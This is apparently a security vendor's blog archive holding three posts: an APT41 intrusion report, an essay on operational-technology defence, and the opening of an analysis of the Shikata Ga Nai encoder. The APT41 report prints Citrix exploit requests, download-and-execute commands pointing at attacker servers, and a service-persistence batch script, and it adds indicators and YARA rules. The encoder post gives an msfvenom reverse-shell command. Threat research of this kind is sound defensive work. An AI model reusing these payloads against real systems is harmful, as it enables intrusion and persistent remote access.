Category Archives: Steve Miller

This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


Figure 1: Timeline of key events

The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781

There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.

Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed.

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

Cisco Router Exploitation

On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

GET /test/fuc
HTTP/1.1
Host: 66.42.98\.220
User-Agent: Wget
Connection: close

Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget

66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5:  c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.

Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:

Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

Figure 6: Contents of logger.zip

Here we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.

In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

@echo off

set "WORK_DIR=C:\Windows\System32"

set "DLL_NAME=storesyncsvc.dll"

set "SERVICE_NAME=StorSyncSvc"

set "DISPLAY_NAME=Storage Sync Service"

set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

 sc stop %SERVICE_NAME%

sc delete %SERVICE_NAME%

mkdir %WORK_DIR%

copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f

sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"

SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000

sc description "%SERVICE_NAME%" "%DESCRIPTION%"

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f

net start "%SERVICE_NAME%"

Figure 8: Contents of install.bat

Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive Cache-Control: no-cache

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

ManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long term fix.

Outlook

This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

Previously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

Indicators

Type

Indicator(s)

CVE-2019-19781 Exploitation (Citrix Application Delivery Control)

66.42.98[.]220

CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’

/tmp/bsd

/tmp/un

Cisco Router Exploitation

66.42.98\.220

‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d)

‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc

CVE-2020-10189 (Zoho ManageEngine Desktop Central)

66.42.98[.]220

91.208.184[.]78

74.82.201[.]8

exchange.dumb1[.]com

install.bat (MD5: 7966c2c546b71e800397a67f942858d0)

storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)

C:\Windows\Temp\storesyncsvc.dll

C:\Windows\Temp\install.bat

2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)

C:\Users\[redacted]\install.bat

TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)

C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe

Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78

PowerShell downloading files with Net.WebClient

Detecting the Techniques

FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

Endpoint Security

 

BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)

CERTUTIL.EXE DOWNLOADER A (UTILITY)

Generic.mg.5909983db4d9023e

Generic.mg.3e856162c36b5329

POWERSHELL DOWNLOADER (METHODOLOGY)

SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)

SAMWELL (BACKDOOR)

SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)

Network Security

Backdoor.Meterpreter

DTI.Callback

Exploit.CitrixNetScaler

Trojan.METASTAGE

Exploit.ZohoManageEngine.CVE-2020-10198.Pwner

Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix

CITRIX ADC [Suspicious Commands]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
 MALWARE METHODOLOGY [Certutil User-Agent]
 WINDOWS METHODOLOGY [BITSadmin Transfer]
 WINDOWS METHODOLOGY [Certutil Downloader]

MITRE ATT&CK Technique Mapping

ATT&CK

Techniques

Initial Access

External Remote Services (T1133), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064)

Persistence

New Service (T1050)

 

Privilege Escalation

Exploitation for Privilege Escalation (T1068)

 

Defense Evasion

BITS Jobs (T1197), Process Injection (T1055)

 

 

Command And Control

Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

Appendix A: Discovery Rules

The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.

import "pe"

rule ExportEngine_APT41_Loader_String

{

            meta:

                        author = "@stvemillertime"

                        description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"

            strings:

                        $pcre = /loader_[\x00-\x7F]{1,}\x00/

            condition:

                        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_ShortName

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a single character"

    strings:

        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_xArch

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a something like x32.dat"

            strings:

             $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/

            condition:

             uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule RareEquities_LibTomCrypt

{

    meta:

        author = "@stvemillertime"

        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."

    strings:

        $a1 = "LibTomMath"

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1

}

rule RareEquities_KCP

{

    meta:

        author = "@stvemillertime"

        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

    strings:

        $a01 = "[RO] %ld bytes"

        $a02 = "recv sn=%lu"

        $a03 = "[RI] %d bytes"

        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

        $a05 = "input psh: sn=%lu ts=%lu"

        $a06 = "input probe"

        $a07 = "input wins: %lu"

        $a08 = "rcv_nxt=%lu\\n"

        $a09 = "snd(buf=%d, queue=%d)\\n"

        $a10 = "rcv(buf=%d, queue=%d)\\n"

        $a11 = "rcvbuf"

    condition:

        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

}

rule ConventionEngine_Term_Users

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Term_Desktop

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Anomaly_MultiPDB_Double

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

}

The FireEye Approach to Operational Technology Security

Today FireEye launches the Cyber Physical Threat Intelligence subscription, which provides cyber security professionals with unmatched context, data and actionable analysis on threats and risk to cyber physical systems. In light of this release, we thought it would be helpful to explain FireEye’s philosophy and broader approach to operational technology (OT) security. In summary, combined visibility into both the IT and OT environments is critical for detecting malicious activity at any stage of an OT intrusion. The FireEye approach to OT security is to:

Detect threats early using full situational awareness of IT and OT networks.

The surface area for most intrusions transcend architectural layers because at almost every level along the way there are computers (servers and workstations) and networks using the same or similar operating systems and protocols as used in IT, which serve as an avenue of approach for impacting physical assets or control of a physical process. The oft touted airgap is in many cases a myth.

There is often a singular focus from the security community on industrial control system (ICS) malware largely due to its novel nature and the fact that there have been very few examples found. This attention is useful for a variety of reasons, but disproportionate to the actual methods of the intrusions where ICS-tailored malware is used. In the attacks utilizing Industroyer and TRITON, the attackers moved from the IT network to the OT network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz extracts, remote desktop sessions and other well-documented, easily detected attack methods were used throughout these intrusions and found at every level of the IT, IT DMZ, OT DMZ and OT environments.

We believe that defenders and incident responders should focus much more attention on intrusion methods, or TTPs, across the attack lifecycle, most of which are present on what we call “intermediary systems”—predominately networked workstations and servers using operating systems and protocols that are similar to or the same as those used in IT, which are used as stepping-stones to gain access to OT assets. This approach is effective because almost all sophisticated OT attacks leverage these systems as stepping stones to their ultimate target.

To illustrate this philosophy, we present some new concepts for approaching OT threats, including the Funnel of Opportunity for OT Threat Detection and the Theory of 99, as well as practical examples derived from our analysis and incident response work. We hope these ideas challenge others in the security community to put forward new ideas and drive discussion and collaboration. We strive for a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time and their freedom.

The "Funnel of Opportunity" Highlights the Value of Detecting OT Attacks In "Intermediary Systems"

Over the past 15 years of responding to and analyzing many of the most important threats in IT and OT, FireEye observed a consistent pattern across almost all OT security incidents: There is an inverse relationship between the presence of an attacker’s activities and the severity of consequence to physical assets or processes. The attack lifecycle when viewed like this begins to take on a “funnel” shape, representing both the breadth of attacker footprint and the breadth of detection opportunity for any given level. Similarly, from top to bottom we represent the timeline of the intrusion and its proximity to the physical world. The bottom is the cross-over of impact from the cyber world to the physical world.


Figure 1: The Funnel of Opportunity for OT Threat Detection

In the early stages of the attack lifecycle, the intruder spends prolonged periods of time targeting components such as servers and workstations across IT and the IT DMZ. Identifying threat activity at this architectural level is relatively straightforward given that dwell time is high, threat actors often leave visible traces, and there are many mature security tools, services and other capabilities designed to detect this activity. While it is difficult to anticipate or associate this early intrusion activity in IT layers with more complex OT targeted attacks, IT networks remain the best zone to detect attacks.

In addition to being relatively easy to detect, early attacker activity also presents a very low risk of negative impact to OT networks. This is primarily because OT networks are commonly segmented, often with an OT DMZ separating them from IT, limiting attacker access to the industrial process. Also, targeted OT attacks commonly require threat actors to acquire abundant process documentation to determine how to cause a desired outcome. While some of this information may be available in IT networks, planning this type of attack would almost certainly require further process visibility only available in the OT network. This is why, as the intrusion progresses and the attacker gets closer or gains access to OT networks, the severity of possible negative outcomes becomes proportionally higher. However, the activity becomes more difficult to detect as the attacker’s footprint grows smaller and there are fewer security tools available to defenders.

The TRITON and Industroyer Attacks Exemplify This Phenomenon

Figure 2 shows an approximate representation of endpoints that were compromised across the architecture of victim organizations during the TRITON and Industroyer attacks. The Funnel of Opportunity is located in the intersection between the two triangles. It is here where the balance between attacker presence and operational consequence of an intrusion makes it easier and more meaningful for security organizations to identify threat activity. As a result, threat hunting close to the OT DMZ and DCS represents the most efficient approach as the detectable features of the intrusion are still present and the severity of potential consequences of the intrusion is high, but still not critical.


Figure 2: Approximate representation of endpoints compromised during the TRITON and Industroyer attacks

In both the TRITON and Industroyer incidents, the threat actor followed a consistent pattern traversing the victims’ architecture from IT networks, through the OT network, and ultimately reaching the physical process controls. In both incidents, we observed that the actor moved through segmented architectures using computers located in different zones. While we only illustrated two incidents in this blog post, we highlight that movement across zones leveraging computers has also been observed in every public OT security incident to date.

The Theory of 99: Almost All Threat Activity Happens in Windows and Linux Systems

FireEye’s unique visibility into the full attack lifecycle of thousands of intrusions from both independent research and first-hand incident response experience has enabled us to support this theory with real-world data, some of which we share here. FireEye has consistently identified similar TTPs leveraged by threat actors regardless of their target industry or ultimate goals. We believe that visibility into network traffic and endpoint behaviors are some of the most important components for IT security. These components are also critical in preventing pivots to key assets in the OT network and detecting threat activity once it does reach OT.

Our observations can be summarized in what we call the Theory of 99, which states that in intrusions that go deep enough to impact OT:

  • 99% of compromised systems will be computer workstations and servers
  • 99% of malware will be designed for computer workstations and servers
  • 99% of forensics will be performed on computer workstations and servers
  • 99% of detection opportunities will be for activity connected to computer workstations and servers
  • 99% of intrusion dwell time happens in commercial off-the-shelf (COTS) computer equipment before any Purdue level 0-1 devices are impacted

As a result, there is often a significant overlap across TTPs utilized by threat actors targeting both IT and OT networks.


Figure 3: TTPs seen across both IT and OT incidents

Figure 3 presents a summary of TTP overlaps between TRITON, Industroyer, and some relatively common activity from cybercrime group FIN6. FIN6 is a group of intrusion operators who have compromised multiple point-of-sale (POS) environments to steal payment card data and sell it in on the dark web. While the motivations and ultimate goal of the threat actors that developed TRITON and Industroyer differ significantly from FIN6, the three actors share common TTPs, including the use of Meterpreter, compromising dual-homed systems, leveraging RDP to establish remote connections and so forth. The overlap in tools and TTPs across actors interested in IT and OT should be of no surprise. The use of IT tools for OT compromises directly corresponds to a trend best known as IT/OT convergence. As IT equipment increasingly becomes integrated in OT systems and networks to improve efficiency and manageability, we can expect threat actors to be able to leverage networked computers as a conduit to reach industrial controls.

Drawing parallels between intrusions into high security environments, we can gain insight into actor behaviors and identify detection opportunities earlier in the attack lifecycle. Intelligence on intrusions across various sectors can be useful in highlighting which common and emerging adversary tools and TTPs are likely to be used in tailored attacks against organizations with OT assets.

FireEye Services, Intelligence, and Technology Provide Unparalleled Protection In IT and OT

While the FireEye approach to OT security detailed in this blog post emphasizes the criticality of “intermediary systems” when defending OT, we do not want to downplay the importance of the OT expertise and technology needed to respond to the most critical 1% of threat activity that does impact control systems. OT is in our DNA at FireEye: FireEye Mandiant’s OT practice has been one of the leading industry voices over the past six years, and the FireEye Cyber Physical Intelligence offering is the most recent evolution of the heritage of Critical Intelligence—the first commercial OT threat intelligence company founded in 2009.


Figure 4: FireEye OT-specific offerings

We believe that sharing our philosophy for OT security and highlighting FireEye’s comprehensive OT security capabilities will help organizations look at this security challenge from a different angle and take tangible steps forward to build a robust, all-encompassing security program. Figure 4 maps FireEye’s OT security offerings against the NIST Cybersecurity Framework’s Five Functions, matching FireEye services to the lifecycle of an organization’s cyber security risk management.

If you are interested in learning more or purchasing FireEye OT-focused solutions, you can reach out here: FireEye OT Solutions.

Shikata Ga Nai Encoder Still Going Strong

One of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits, pluggable payload environment, and simplicity of execution makes it the de facto base platform. Metasploit is used by pentesters, security enthusiasts, script kiddies, and even malicious actors. It is so prevalent that its user base even includes APT threat actors, as we will demonstrate later in the blog post.

Despite Metasploit’s over 15 year existence, there are still core techniques that go undetected, allowing malicious actors to evade detection. One of these core techniques is the Shikata Ga Nai (SGN) payload encoding scheme. Modern detection systems have improved dramatically over the last several years and will often catch plain vanilla versions of known malicious methods. In many cases though, if a threat actor knows what they are doing they can slightly modify existing code to bypass detection.

Before we jump into how SGN works we’ll give a little background knowledge surrounding it. When threat actors plan to attack systems, they go through an assessment process of risk and reward. They cycle through questions of stealth and attribution. Some of these questions include: How much effort do I need to put into not getting caught? What happens if I get caught? How long can I reasonably evade detection? Will the discovery of my presence be attributed back to me? One such way APT actors have attempted to elude detection in the first place has been via encoding.

We know shellcode is primarily a set of instructions designed to manipulate execution of a program in ways not originally intended. The goal is to inject this shellcode into a vulnerable process. To manually create shellcode, one can pull the opcodes from machine code directly or pull them from an assembler/disasembler tool such as MASM (Microsoft Macro Assembler). Raw generated opcodes often will not execute out of the box. They often require being touched up and made compatible with the processor they are executed on and the programming language they are being used for. An encoding scheme such as SGN takes care of these incompatibilities. Also, shellcode in a non-obfuscated state can be readily recognizable via static detection techniques. SGN provides obfuscation and at a first glance, randomness in the obfuscation of the shellcode.

Metasploit’s default configuration encodes all payloads. While Metasploit contains a variety of encoders, the most popular has been SGN. The phrase SGN in the Japanese language means “nothing can be done”. It was given this name as at the time it was created traditional anti-virus products had difficulty with detection. As mentioned, some AV vendors are now catching vanilla implementations, but miss slightly modified variants.

SGN is a polymorphic XOR additive feedback encoder. It is polymorphic in that each creation of encoded shellcode is going to be different from the next. It accomplishes this through a variety of techniques such as dynamic instruction substitution, dynamic block ordering, randomly interchanging registers, randomizing instruction ordering, inserting junk code, using a random key, and randomization of instruction spacing between other instructions. The XOR additive feedback piece in this case refers to the fact the algorithm is XORing future instructions via a random key and then adding that instruction to the key to be used again to encode the next instruction. Decoding the shellcode is a process of following the steps in reverse.

Creating an SGN Encoded Payload

The following steps can be recreated with Metasploit and your choice of debugging/disassembly tools:

  1. First create a plain vanilla SGN encoded payload:
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.169.0.36 LPORT=80 -b "\x00" -e x86/shikata_ga_nai -f exe -o /root/Desktop/metasploit/IamNotBad.exe
  2. Open the file in a disassembler. Upon looking at the binary in a disassembler, you first notice a great deal of junk instructions (Figure 1). Also, Metasploit by default does not set the memory location of the code (.text section in this case) as writable. This will need to be set, otherwise the shellcode will not run.


Figure 1: Junk instructions when viewing the binary in a disassembler


Figure 2: RWX Flag = E0000020


Figure 3: Skip the junk code and go directly to the algorithm, which can be done by inserting a jump instruction

